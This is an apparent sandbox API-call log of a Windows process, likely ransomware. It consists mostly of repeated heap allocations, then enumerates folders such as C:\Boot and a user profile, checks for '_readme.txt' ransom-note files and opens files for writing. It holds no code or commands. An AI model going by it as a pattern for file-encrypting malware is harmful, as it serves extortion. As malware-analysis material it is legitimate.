Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.287] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.289] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0058.289] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.290] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.290] PathFindFileNameW (pszPath="") returned="" [0058.290] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.290] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.290] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.290] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.290] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0058.290] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0058.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.290] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.291] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.291] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.291] PathFindExtensionW (pszPath="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned=".mui" [0058.291] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.291] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc2910, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.291] PathFindExtensionW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned=".txt" [0058.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.291] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc2910, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.291] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.291] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.291] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.291] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0058.291] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0058.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.291] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.291] PathFindFileNameW (pszPath="") returned="" [0058.292] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.292] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.292] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.292] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.292] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0058.292] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0058.292] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.293] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.293] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0058.293] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0058.293] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0058.293] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0058.293] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb331210, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0xb331210, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 